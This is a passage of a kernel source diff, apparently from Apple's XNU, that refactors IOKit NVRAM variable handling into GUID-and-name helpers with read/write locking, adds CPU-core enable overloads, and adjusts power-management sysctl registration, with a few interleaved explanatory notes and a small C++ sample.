+
+       if (skipKey(aKey)) {
+               return nullptr;
+       }
+       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
+
+       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
+
+       return copyPropertyWithGUIDAndName(&varGuid, variableName);
+}
+
 OSSharedPtr<OSObject>
 IODTNVRAM::copyProperty(const char *aKey) const
 {
@@ -1220,64 +1302,64 @@ IODTNVRAM::getProperty(const char *aKey) const
 }
 
 IOReturn
-IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
+IODTNVRAM::setPropertyWithGUIDAndName(const uuid_t *guid, const char *name, OSObject *anObject)
 {
-       IOReturn              result = kIOReturnSuccess;
+       IOReturn              ret = kIOReturnSuccess;
        bool                  remove = false;
        OSString              *tmpString = nullptr;
        OSSharedPtr<OSObject> propObject, oldObject;
        OSSharedPtr<OSObject> sharedObject(anObject, OSRetain);
-       const char            *variableName;
-       uuid_t                varGuid;
        OSDictionary          *dict;
        bool                  deletePropertyKey, syncNowPropertyKey, forceSyncNowPropertyKey;
        bool                  ok;
        size_t                propDataSize = 0;
 
-       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
-
-       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
-       deletePropertyKey = strncmp(variableName, kIONVRAMDeletePropertyKey, sizeof(kIONVRAMDeletePropertyKey)) == 0;
-       syncNowPropertyKey = strncmp(variableName, kIONVRAMSyncNowPropertyKey, sizeof(kIONVRAMSyncNowPropertyKey)) == 0;
-       forceSyncNowPropertyKey = strncmp(variableName, kIONVRAMForceSyncNowPropertyKey, sizeof(kIONVRAMForceSyncNowPropertyKey)) == 0;
+       deletePropertyKey = strncmp(name, kIONVRAMDeletePropertyKey, sizeof(kIONVRAMDeletePropertyKey)) == 0;
+       syncNowPropertyKey = strncmp(name, kIONVRAMSyncNowPropertyKey, sizeof(kIONVRAMSyncNowPropertyKey)) == 0;
+       forceSyncNowPropertyKey = strncmp(name, kIONVRAMForceSyncNowPropertyKey, sizeof(kIONVRAMForceSyncNowPropertyKey)) == 0;
 
        if (deletePropertyKey) {
                tmpString = OSDynamicCast(OSString, anObject);
                if (tmpString != nullptr) {
+                       const char *variableName;
+                       uuid_t     varGuid;
+
                        DEBUG_INFO("kIONVRAMDeletePropertyKey found\n");
-                       OSSharedPtr<const OSSymbol> sharedKey = OSSymbol::withString(tmpString);
-                       removeProperty(sharedKey.get());
+
+                       parseVariableName(tmpString->getCStringNoCopy(), &varGuid, &variableName);
+                       removePropertyWithGUIDAndName(&varGuid, variableName);
                } else {
                        DEBUG_INFO("kIONVRAMDeletePropertyKey value needs to be an OSString\n");
-                       result = kIOReturnError;
+                       ret = kIOReturnError;
                }
                goto exit;
        } else if (syncNowPropertyKey || forceSyncNowPropertyKey) {
                tmpString = OSDynamicCast(OSString, anObject);
-               DEBUG_INFO("NVRAM sync key %s found\n", aKey->getCStringNoCopy());
+               DEBUG_INFO("NVRAM sync key %s found\n", name);
                if (tmpString != nullptr) {
                        // We still want to throttle NVRAM commit rate for SyncNow. ForceSyncNow is provided as a really big hammer.
                        syncInternal(syncNowPropertyKey);
                } else {
-                       DEBUG_INFO("%s value needs to be an OSString\n", variableName);
-                       result = kIOReturnError;
+                       DEBUG_INFO("%s value needs to be an OSString\n", name);
+                       ret = kIOReturnError;
                }
                goto exit;
        }
 
-       result = chooseDictionary(kIONVRAMOperationWrite, &varGuid, variableName, &dict);
-       if (result != kIOReturnSuccess) {
+       ret = chooseDictionary(kIONVRAMOperationWrite, guid, name, &dict);
+       if (ret != kIOReturnSuccess) {
+               DEBUG_INFO("No dictionary\n");
                goto exit;
        }
 
-       if (!verifyPermission(kIONVRAMOperationWrite, &varGuid, variableName)) {
+       if (!verifyPermission(kIONVRAMOperationWrite, guid, name)) {
                DEBUG_INFO("Not privileged\n");
-               result = kIOReturnNotPrivileged;
+               ret = kIOReturnNotPrivileged;
                goto exit;
        }
 
        // Make sure the object is of the correct type.
-       switch (getVariableType(variableName)) {
+       switch (getVariableType(name)) {
        case kOFVariableTypeBoolean:
                propObject = OSDynamicPtrCast<OSBoolean>(sharedObject);
                break;
@@ -1291,9 +1373,9 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
                if (propObject != nullptr) {
                        propDataSize = (OSDynamicPtrCast<OSString>(propObject))->getLength();
 
-                       if (aKey->isEqualTo(kIONVRAMBootArgsKey) && (propDataSize >= BOOT_LINE_LENGTH)) {
+                       if ((strncmp(name, kIONVRAMBootArgsKey, sizeof(kIONVRAMBootArgsKey)) == 0) && (propDataSize >= BOOT_LINE_LENGTH)) {
                                DEBUG_ERROR("boot-args size too large for BOOT_LINE_LENGTH, propDataSize=%zu\n", propDataSize);
-                               result = kIOReturnNoSpace;
+                               ret = kIOReturnNoSpace;
                                goto exit;
                        }
                }
@@ -1325,18 +1407,18 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
 
        if (propObject == nullptr) {
                DEBUG_INFO("No property object\n");
-               result = kIOReturnBadArgument;
+               ret = kIOReturnBadArgument;
                goto exit;
        }
 
-       if (!verifyWriteSizeLimit(&varGuid, variableName, propDataSize)) {
-               DEBUG_ERROR("Property data size of %zu too long for %s\n", propDataSize, variableName);
-               result = kIOReturnNoSpace;
+       if (!verifyWriteSizeLimit(guid, name, propDataSize)) {
+               DEBUG_ERROR("Property data size of %zu too long for %s\n", propDataSize, name);
+               ret = kIOReturnNoSpace;
                goto exit;
        }
 
-       NVRAMLOCK();
-       ok = handleSpecialVariables(variableName, &varGuid, propObject.get(), &result);
+       NVRAMWRITELOCK();
+       ok = handleSpecialVariables(name, guid, propObject.get(), &ret);
        NVRAMUNLOCK();
 
        if (ok) {
@@ -1344,39 +1426,42 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
                goto exit;
        }
 
-       NVRAMLOCK();
-       oldObject.reset(dict->getObject(variableName), OSRetain);
+       NVRAMREADLOCK();
+       oldObject.reset(dict->getObject(name), OSRetain);
+       NVRAMUNLOCK();
+
        if (remove == false) {
                DEBUG_INFO("Adding object\n");
-               if (!dict->setObject(variableName, propObject.get())) {
-                       result = kIOReturnBadArgument;
+               NVRAMWRITELOCK();
+               if (!dict->setObject(name, propObject.get())) {
+                       ret = kIOReturnBadArgument;
                }
+               NVRAMUNLOCK();
        } else {
                DEBUG_INFO("Removing object\n");
                // Check for existence so we can decide whether we need to sync variables
                if (oldObject) {
-                       result = removePropertyInternal(aKey);
+                       ret = removePropertyWithGUIDAndName(guid, name);
                } else {
-                       result = kIOReturnNotFound;
+                       ret = kIOReturnNotFound;
                }
        }
-       NVRAMUNLOCK();
 
-       if (result == kIOReturnSuccess) {
-               result = serializeVariables();
-               if (result != kIOReturnSuccess) {
-                       DEBUG_ERROR("serializeVariables failed, result=0x%08x\n", result);
+       if (ret == kIOReturnSuccess) {
+               ret = serializeVariables();
+               if (ret != kIOReturnSuccess) {
+                       DEBUG_ERROR("serializeVariables failed, ret=%#08x\n", ret);
 
-                       NVRAMLOCK();
+                       NVRAMWRITELOCK();
                        if (oldObject) {
-                               dict->setObject(variableName, oldObject.get());
+                               dict->setObject(name, oldObject.get());
                        } else {
-                               dict->removeObject(variableName);
+                               dict->removeObject(name);
                        }
                        NVRAMUNLOCK();
 
                        (void) serializeVariables();
-                       result = kIOReturnNoMemory;
+                       ret = kIOReturnNoMemory;
                }
        }
 
@@ -1388,9 +1473,22 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
        }
 
 exit:
-       DEBUG_INFO("result=0x%08x\n", result);
+       DEBUG_INFO("ret=%#08x\n", ret);
 
-       return result;
+       return ret;
+}
+
+IOReturn
+IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
+{
+       const char            *variableName;
+       uuid_t                varGuid;
+
+       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
+
+       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
+
+       return setPropertyWithGUIDAndName(&varGuid, variableName, anObject);
 }
 
 bool
@@ -1404,55 +1502,77 @@ IODTNVRAM::removeProperty(const OSSymbol *aKey)
 {
        IOReturn ret;
 
-       NVRAMLOCK();
        ret = removePropertyInternal(aKey);
-       NVRAMUNLOCK();
 
        if (ret == kIOReturnSuccess) {
                serializeVariables();
        } else {
-               DEBUG_INFO("removePropertyInternal failed, ret=0x%08x\n", ret);
+               DEBUG_INFO("removePropertyInternal failed, ret=%#08x\n", ret);
        }
 }
 
 IOReturn
-IODTNVRAM::removePropertyInternal(const OSSymbol *aKey)
+IODTNVRAM::removePropertyWithGUIDAndName(const uuid_t *guid, const char *name)
 {
-       IOReturn     result;
-       const char   *variableName;
-       uuid_t       varGuid;
+       IOReturn     ret;
        OSDictionary *dict;
+       bool removed = false;
 
-       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
-
-       NVRAMLOCKASSERT();
-
-       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
+       DEBUG_INFO("name=%s\n", name);
 
-       result = chooseDictionary(kIONVRAMOperationDelete, &varGuid, variableName, &dict);
-       if (result != kIOReturnSuccess) {
+       ret = chooseDictionary(kIONVRAMOperationDelete, guid, name, &dict);
+       if (ret != kIOReturnSuccess) {
+               DEBUG_INFO("No dictionary\n");
                goto exit;
        }
 
-       if (!verifyPermission(kIONVRAMOperationDelete, &varGuid, variableName)) {
+       if (!verifyPermission(kIONVRAMOperationDelete, guid, name)) {
                DEBUG_INFO("Not priveleged\n");
-               result = kIOReturnNotPrivileged;
+               ret = kIOReturnNotPrivileged;
                goto exit;
        }
 
+       NVRAMWRITELOCK();
+
        // If the object exists, remove it from the dictionary.
-       if (dict->getObject(variableName) != nullptr) {
-               dict->removeObject(variableName);
+       if (dict->getObject(name) != nullptr) {
+               dict->removeObject(name);
+               removed = true;
+       } else {
+               DEBUG_INFO("%s not found\n", name);
+       }
+
+       NVRAMUNLOCK();
+
+       if (removed) {
+               ret = serializeVariables();
+               DEBUG_INFO("serializeVariables ret=0x%08x\n", ret);
        }
 
 exit:
-       return result;
+       return ret;
+}
+
+IOReturn
+IODTNVRAM::removePropertyInternal(const OSSymbol *aKey)
+{
+       IOReturn     ret;
+       const char   *variableName;
+       uuid_t       varGuid;
+
+       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
+
+       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
+
+       ret = removePropertyWithGUIDAndName(&varGuid, variableName);
+
+       return ret;
 }
 
 IOReturn
 IODTNVRAM::setProperties(OSObject *properties)
 {
-       IOReturn                          result = kIOReturnSuccess;
+       IOReturn                          ret = kIOReturnSuccess;
        OSObject                          *object;
        const OSSymbol                    *key;
        OSDictionary                      *dict;
@@ -1470,7 +1590,7 @@ IODTNVRAM::setProperties(OSObject *properties)
                return kIOReturnBadArgument;
        }
 
-       while (result == kIOReturnSuccess) {
+       while (ret == kIOReturnSuccess) {
                key = OSDynamicCast(OSSymbol, iter->getNextObject());
                if (key == nullptr) {
                        break;
@@ -1481,12 +1601,12 @@ IODTNVRAM::setProperties(OSObject *properties)
                        continue;
                }
 
-               result = setPropertyInternal(key, object);
+               ret = setPropertyInternal(key, object);
        }
 
-       DEBUG_INFO("result=0x%08x\n", result);
+       DEBUG_INFO("ret=%#08x\n", ret);
 
-       return result;
+       return ret;
 }
 
 IOReturn
@@ -1634,8 +1754,8 @@ IODTNVRAM::initVariables(void)
        OSSharedPtr<const OSSymbol> propSymbol;
        OSSharedPtr<OSObject>       propObject;
        NVRAMRegionInfo             *currentRegion;
-       NVRAMRegionInfo             variableRegions[] = { { NVRAM_CHRP_PARTITION_NAME_COMMON, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage},
-                                                         { NVRAM_CHRP_PARTITION_NAME_SYSTEM, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} };
+       NVRAMRegionInfo             variableRegions[] = { { kIONVRAMPartitionCommon, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage},
+                                                         { kIONVRAMPartitionSystem, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} };
 
        DEBUG_INFO("...\n");
 
@@ -1648,7 +1768,7 @@ IODTNVRAM::initVariables(void)
 
                currentRegion->dict = OSDictionary::withCapacity(1);
 
-               DEBUG_INFO("region = %s\n", currentRegion->name);
+               DEBUG_INFO("region = %d\n", currentRegion->type);
                cnt = 0;
                while (cnt < currentRegion->size) {
                        // Break if there is no name.
@@ -1695,14 +1815,23 @@ IODTNVRAM::initVariables(void)
        }
 
        // Create the boot-args property if it is not in the dictionary.
-       if (_commonDict->getObject(kIONVRAMBootArgsKey) == nullptr) {
-               propObject = OSString::withCStringNoCopy("");
-               if (propObject != nullptr) {
-                       _commonDict->setObject(kIONVRAMBootArgsKey, propObject.get());
+       if (_systemDict != nullptr) {
+               if (_systemDict->getObject(kIONVRAMBootArgsKey) == nullptr) {
+                       propObject = OSString::withCStringNoCopy("");
+                       if (propObject != nullptr) {
+                               _systemDict->setObject(kIONVRAMBootArgsKey, propObject.get());
+                       }
+               }
+       } else if (_commonDict != nullptr) {
+               if (_commonDict->getObject(kIONVRAMBootArgsKey) == nullptr) {
+                       propObject = OSString::withCStringNoCopy("");
+                       if (propObject != nullptr) {
+                               _commonDict->setObject(kIONVRAMBootArgsKey, propObject.get());
+                       }
                }
        }
 
-       DEBUG_INFO("%s _commonDict=%p _systemDict=%p\n", __FUNCTION__, _commonDict.get(), _systemDict.get());
+       DEBUG_INFO("%s _commonDict=%p _systemDict=%p\n", __FUNCTION__, _commonDict ? _commonDict.get() : nullptr, _systemDict ? _systemDict.get() : nullptr);
 
        return kIOReturnSuccess;
 }
@@ -1728,8 +1857,8 @@ IODTNVRAM::serializeVariables(void)
        UInt32                            commonUsed = 0;
        OSSharedPtr<OSData>               nvramImage;
        NVRAMRegionInfo                   *currentRegion;
-       NVRAMRegionInfo                   variableRegions[] = { { NVRAM_CHRP_PARTITION_NAME_COMMON, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage},
-                                                               { NVRAM_CHRP_PARTITION_NAME_SYSTEM, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} };
+       NVRAMRegionInfo                   variableRegions[] = { { kIONVRAMPartitionCommon, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage},
+                                                               { kIONVRAMPartitionSystem, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} };
 
        if (_systemPanicked) {
                return kIOReturnNotReady;
@@ -1742,7 +1871,7 @@ IODTNVRAM::serializeVariables(void)
 
        DEBUG_INFO("...\n");
 
-       NVRAMLOCK();
+       NVRAMREADLOCK();
 
        for (regionIndex = 0; regionIndex < ARRAY_SIZE(variableRegions); regionIndex++) {
                currentRegion = &variableRegions[regionIndex];
@@ -1751,10 +1880,12 @@ IODTNVRAM::serializeVariables(void)
                        continue;
                }
 
-               DEBUG_INFO("region = %s\n", currentRegion->name);
+               DEBUG_INFO("region = %d\n", currentRegion->type);
                buffer = tmpBuffer = IONew(UInt8, currentRegion->size);
                if (buffer == nullptr) {
-                       return kIOReturnNoMemory;
+                       ok = false;
+                       ret = kIOReturnNoMemory;
+                       break;
                }
                bzero(buffer, currentRegion->size);
 
@@ -1790,44 +1921,48 @@ IODTNVRAM::serializeVariables(void)
 
                IODelete(buffer, UInt8, currentRegion->size);
 
-               if ((strncmp(currentRegion->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM)) == 0) &&
+               if ((currentRegion->type == kIONVRAMPartitionSystem) &&
                    (_systemService != nullptr)) {
-                       _systemService->setProperties(_systemDict.get());
-                       systemUsed = maxLength;
-               } else if ((strncmp(currentRegion->name, NVRAM_CHRP_PARTITION_NAME_COMMON, strlen(NVRAM_CHRP_PARTITION_NAME_COMMON)) == 0) &&
+                       _systemService->setVariables(_systemDict.get());
+                       systemUsed = (uint32_t)(tmpBuffer - buffer);
+               } else if ((currentRegion->type == kIONVRAMPartitionCommon) &&
                    (_commonService != nullptr)) {
-                       _commonService->setProperties(_commonDict.get());
-                       commonUsed = maxLength;
+                       _commonService->setVariables(_commonDict.get());
+                       commonUsed = (uint32_t)(tmpBuffer - buffer);
                }
 
                if (!ok) {
-                       return kIOReturnBadArgument;
+                       ret = kIOReturnBadArgument;
+                       break;
                }
        }
 
-       nvramImage = OSData::withBytes(_nvramImage, _nvramSize);
-
        NVRAMUNLOCK();
 
        DEBUG_INFO("ok=%d\n", ok);
 
-       CONTROLLERLOCK();
+       if (ok) {
+               nvramImage = OSData::withBytes(_nvramImage, _nvramSize);
+               CONTROLLERLOCK();
 
-       if (_systemService) {
-               sizeUsed = OSNumber::withNumber(systemUsed, 32);
-               _nvramController->setProperty("SystemUsed", sizeUsed.get());
-               sizeUsed.reset();
-       }
+               if (_systemService) {
+                       sizeUsed = OSNumber::withNumber(systemUsed, 32);
+                       _nvramController->setProperty("SystemUsed", sizeUsed.get());
+                       DEBUG_INFO("SystemUsed=%u\n", (unsigned int)systemUsed);
+                       sizeUsed.reset();
+               }
 
-       if (_commonService) {
-               sizeUsed = OSNumber::withNumber(commonUsed, 32);
-               _nvramController->setProperty("CommonUsed", sizeUsed.get());
-               sizeUsed.reset();
-       }
+               if (_commonService) {
+                       sizeUsed = OSNumber::withNumber(commonUsed, 32);
+                       _nvramController->setProperty("CommonUsed", sizeUsed.get());
+                       DEBUG_INFO("CommonUsed=%u\n", (unsigned int)commonUsed);
+                       sizeUsed.reset();
+               }
 
-       ret = _nvramController->write(0, (uint8_t *)nvramImage->getBytesNoCopy(), nvramImage->getLength());
+               ret = _nvramController->write(0, (uint8_t *)nvramImage->getBytesNoCopy(), nvramImage->getLength());
 
-       CONTROLLERUNLOCK();
+               CONTROLLERUNLOCK();
+       }
 
        return ret;
 }
@@ -1932,11 +2067,11 @@ IODTNVRAM::convertPropToObject(UInt8 *propName, UInt32 propNameLength,
 {
        const OSSymbol* propSymbolRaw = nullptr;
        OSObject* propObjectRaw = nullptr;
-       bool result = convertPropToObject(propName, propNameLength, propData, propDataLength,
+       bool ok = convertPropToObject(propName, propNameLength, propData, propDataLength,
            &propSymbolRaw, &propObjectRaw);
        propSymbol.reset(propSymbolRaw, OSNoRetain);
        propObject.reset(propObjectRaw, OSNoRetain);
-       return result;
+       return ok;
 }
 
 bool
@@ -2020,7 +2155,7 @@ IODTNVRAM::convertObjectToProp(UInt8 *buffer, UInt32 *length,
                } else if (tmpValue < 1000) {
                        snprintf((char *)buffer, remaining, "%d", (uint32_t)tmpValue);
                } else {
-                       snprintf((char *)buffer, remaining, "0x%x", (uint32_t)tmpValue);
+                       snprintf((char *)buffer, remaining, "%#x", (uint32_t)tmpValue);
                }
        }
        break;
@@ -2226,7 +2361,7 @@ IODTNVRAM::readNVRAMPropertyType1(IORegistryEntry *entry,
        UInt32       resultValueLen = 0;
        UInt8       byte;
 
-       NVRAMLOCK();
+       NVRAMREADLOCK();
        data = OSDynamicCast(OSData, _commonDict->getObject(_registryPropertiesKey.get()));
        NVRAMUNLOCK();
 
@@ -2300,7 +2435,7 @@ IODTNVRAM::writeNVRAMPropertyType1(IORegistryEntry *entry,
 
        // copy over existing properties for other entries
 
-       NVRAMLOCK();
+       NVRAMWRITELOCK();
 
        oldData.reset(OSDynamicCast(OSData, _commonDict->getObject(_registryPropertiesKey.get())), OSRetain);
        if (oldData) {
@@ -2403,7 +2538,7 @@ IODTNVRAM::writeNVRAMPropertyType1(IORegistryEntry *entry,
 
        if (ok) {
                if (serializeVariables() != kIOReturnSuccess) {
-                       NVRAMLOCK();
+                       NVRAMWRITELOCK();
                        if (oldData) {
                                _commonDict->setObject(_registryPropertiesKey.get(), oldData.get());
                        } else {
index 4fd29c33694a61476ec6622277c2084f07e2a028..48c09e32432fdb73b4ae2cb5d23107a6c99b3793 100644 (file)
 
 #define super IOService
 OSDefineMetaClassAndAbstractStructors(IOPMGR, IOService);
+
+void
+IOPMGR::enableCPUCore(unsigned int cpu_id, uint64_t entry_pa)
+{
+       // Fall back to the legacy method if the subclass doesn't override the
+       // new method.
+       enableCPUCore(cpu_id);
+}
+
+void
+IOPMGR::enableCPUCore(unsigned int cpu_id)
+{
+       panic("enableCPUCore is unimplemented");
+}
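
The two enableCPUCore overloads above form a compatibility shim: the new two-argument entry point falls back to the legacy one-argument method unless a subclass overrides it. A standalone C++ sketch of the same dispatch pattern (class names are illustrative, not kernel code):

    #include <cstdint>
    #include <cstdio>

    struct PMGRBase {
        virtual ~PMGRBase() = default;
        // New hook: forwards to the legacy hook unless a subclass overrides it.
        virtual void enableCPUCore(unsigned int cpu_id, uint64_t entry_pa) { enableCPUCore(cpu_id); }
        // Legacy hook: terminal fallback.
        virtual void enableCPUCore(unsigned int cpu_id) { std::printf("unimplemented for cpu %u\n", cpu_id); }
    };

    struct LegacyPMGR : PMGRBase {
        using PMGRBase::enableCPUCore;             // keep the two-arg overload visible
        void enableCPUCore(unsigned int cpu_id) override { std::printf("legacy enable %u\n", cpu_id); }
    };

    int main()
    {
        LegacyPMGR p;
        // The two-argument call lands in the base shim, which dispatches to the
        // subclass's legacy override.
        static_cast<PMGRBase &>(p).enableCPUCore(3, 0x800000000ULL);
        return 0;
    }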
index ed78c3d76c4e267ba981d335ffd4bb8409a91c9d..4231fad39c5a9c75c5efba53b91c105ca4897cd4 100644 (file)
@@ -54,6 +54,7 @@
 #include <IOKit/IOReportMacros.h>
 #include <IOKit/IOLib.h>
 #include <IOKit/IOKitKeys.h>
+#include <IOKit/IOUserServer.h>
 #include "IOKitKernelInternal.h"
 #if HIBERNATION
 #include <IOKit/IOHibernatePrivate.h>
@@ -519,8 +520,8 @@ static UInt32           gWillShutdown = 0;
 static UInt32           gPagingOff = 0;
 static UInt32           gSleepWakeUUIDIsSet = false;
 static uint32_t         gAggressivesState = 0;
-static uint32_t         gHaltTimeMaxLog;
-static uint32_t         gHaltTimeMaxPanic;
+uint32_t                gHaltTimeMaxLog;
+uint32_t                gHaltTimeMaxPanic;
 IOLock *                gHaltLogLock;
 static char *           gHaltLog;
 enum                  { kHaltLogSize = 2048 };
@@ -605,6 +606,7 @@ static char gShutdownReasonString[80];
 static bool gWakeReasonSysctlRegistered = false;
 static bool gBootReasonSysctlRegistered = false;
 static bool gShutdownReasonSysctlRegistered = false;
+static bool gWillShutdownSysctlRegistered = false;
 static AbsoluteTime gUserActiveAbsTime;
 static AbsoluteTime gUserInactiveAbsTime;
 
@@ -977,6 +979,18 @@ IOSystemShutdownNotification(int stage)
                return;
        }
 
+       if (kIOSystemShutdownNotificationTerminateDEXTs == stage) {
+               uint64_t nano, millis;
+               startTime = mach_absolute_time();
+               IOServicePH::systemHalt();
+               absolutetime_to_nanoseconds(mach_absolute_time() - startTime, &nano);
+               millis = nano / NSEC_PER_MSEC;
+               if (true || (gHaltTimeMaxLog && (millis >= gHaltTimeMaxLog))) {
+                       printf("IOServicePH::systemHalt took %qd ms\n", millis);
+               }
+               return;
+       }
+
        assert(kIOSystemShutdownNotificationStageProcessExit == stage);
 
        IOLockLock(gHaltLogLock);
@@ -1002,7 +1016,6 @@ IOSystemShutdownNotification(int stage)
        }
 }
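
The TerminateDEXTs stage added earlier in this function times IOServicePH::systemHalt() by subtracting mach_absolute_time() samples and converting to milliseconds. A userspace analogue of that measurement, assuming only the Mach timebase APIs (the kernel uses absolutetime_to_nanoseconds() instead):

    #include <cstdint>
    #include <cstdio>
    #include <mach/mach_time.h>
    #include <unistd.h>

    int main()
    {
        mach_timebase_info_data_t tb;
        mach_timebase_info(&tb);

        uint64_t start = mach_absolute_time();
        usleep(25 * 1000);                                   // stand-in for the halt work
        uint64_t elapsed_ticks = mach_absolute_time() - start;

        uint64_t nanos = elapsed_ticks * tb.numer / tb.denom;
        std::printf("took %llu ms\n", (unsigned long long)(nanos / 1000000ULL));
        return 0;
    }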
 
-
 extern "C" int sync_internal(void);
 
 /*
@@ -1171,11 +1184,11 @@ sysctl_sleepwaketime SYSCTL_HANDLER_ARGS
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, sleeptime,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     &gIOLastUserSleepTime, 0, sysctl_sleepwaketime, "S,timeval", "");
 
 static SYSCTL_PROC(_kern, OID_AUTO, waketime,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     &gIOLastWakeTime, 0, sysctl_sleepwaketime, "S,timeval", "");
 
 SYSCTL_QUAD(_kern, OID_AUTO, wake_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, &gIOLastWakeAbsTime, "");
@@ -1184,11 +1197,15 @@ SYSCTL_QUAD(_kern, OID_AUTO, useractive_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, &
 SYSCTL_QUAD(_kern, OID_AUTO, userinactive_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, &gUserInactiveAbsTime, "");
 
 static int
-sysctl_willshutdown
-(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req)
+sysctl_willshutdown SYSCTL_HANDLER_ARGS
 {
-       int new_value, changed;
-       int error = sysctl_io_number(req, gWillShutdown, sizeof(int), &new_value, &changed);
+       int new_value, changed, error;
+
+       if (!gWillShutdownSysctlRegistered) {
+               return ENOENT;
+       }
+
+       error = sysctl_io_number(req, gWillShutdown, sizeof(int), &new_value, &changed);
        if (changed) {
                if (!gWillShutdown && (new_value == 1)) {
                        IOPMRootDomainWillShutdown();
@@ -1200,12 +1217,9 @@ sysctl_willshutdown
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, willshutdown,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_willshutdown, "I", "");
 
-extern struct sysctl_oid sysctl__kern_iokittest;
-extern struct sysctl_oid sysctl__debug_iokit;
-
 #if defined(XNU_TARGET_OS_OSX)
 
 static int
@@ -1241,11 +1255,11 @@ sysctl_progressmeter
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, progressmeterenable,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_progressmeterenable, "I", "");
 
 static SYSCTL_PROC(_kern, OID_AUTO, progressmeter,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_progressmeter, "I", "");
 
 #endif /* defined(XNU_TARGET_OS_OSX) */
@@ -1269,7 +1283,7 @@ sysctl_consoleoptions
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, consoleoptions,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_consoleoptions, "I", "");
 
 
@@ -1280,7 +1294,7 @@ sysctl_progressoptions SYSCTL_HANDLER_ARGS
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, progressoptions,
-    CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
+    CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
     NULL, 0, sysctl_progressoptions, "S,vc_progress_user_options", "");
 
 
@@ -1290,20 +1304,32 @@ sysctl_wakereason SYSCTL_HANDLER_ARGS
        char wr[sizeof(gWakeReasonString)];
 
        wr[0] = '\0';
-       if (gRootDomain) {
+       if (gRootDomain && gWakeReasonSysctlRegistered) {
                gRootDomain->copyWakeReasonString(wr, sizeof(wr));
+       } else {
+               return ENOENT;
        }
 
        return sysctl_io_string(req, wr, 0, 0, NULL);
 }
 
 SYSCTL_PROC(_kern, OID_AUTO, wakereason,
-    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_wakereason, "A", "wakereason");
 
-SYSCTL_STRING(_kern, OID_AUTO, bootreason,
-    CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
-    gBootReasonString, sizeof(gBootReasonString), "");
+static int
+sysctl_bootreason SYSCTL_HANDLER_ARGS
+{
+       if (!os_atomic_load(&gBootReasonSysctlRegistered, acquire)) {
+               return ENOENT;
+       }
+
+       return sysctl_io_string(req, gBootReasonString, 0, 0, NULL);
+}
+
+SYSCTL_PROC(_kern, OID_AUTO, bootreason,
